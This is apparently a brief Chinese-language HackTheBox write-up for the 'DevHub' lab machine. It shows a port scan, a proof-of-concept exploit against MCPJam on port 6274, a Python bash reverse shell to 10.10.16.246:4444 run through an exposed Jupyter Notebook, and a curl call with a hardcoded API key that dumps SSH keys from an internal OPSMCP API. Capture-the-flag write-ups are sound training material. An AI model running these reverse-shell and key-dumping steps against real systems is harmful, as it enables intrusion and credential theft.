HackTheBox DevHub Writeup

HackTheBox DevHub 是一台中等难度的 Linux 机器。本文按照信息收集、初始访问、横向或提权路径的顺序整理完整解题过程,突出关键漏洞点、凭据来源与最终拿到 user/root 权限的利用链。

信息收集

rustscan -a 10.129.245.216 -- -sC -sV -oN nmap_result.txt

端口备注
22OpenSSH 8.9p1
80nginx 1.18.0
6274MCPJam v1.4.2

MCPJam v1.4.2 存在CVE-2026-23744 未授权漏洞


Foothold

POC

python exploit.py -u http://10.129.245.216:6274/ -l 10.10.16.246 -p 4444

USER

ps aux| grep analyst ss -stnlp 在端口8888运行着Jupyter Notebook并且暴露了token,通过端口转发后,进行命令执行

import os

os.system("bash -c 'bash -i >& /dev/tcp/10.10.16.246/4444 0>&1'")

ROOT

/opt/opsmcp/server.py发现5000端口运行OPSMCP API 2.1.0

curl -X POST \   
http://127.0.0.1:5000/tools/call \
-H "X-API-Key: opsmcp_secret_key_4f5a6b7c8d9e0f1a" \
-H "Content-Type: application/json" \
-d ' 
{                          
"name":"ops._admin_dump",
"arguments":{
"target":"ssh_keys",            
"confirm":true
}
}'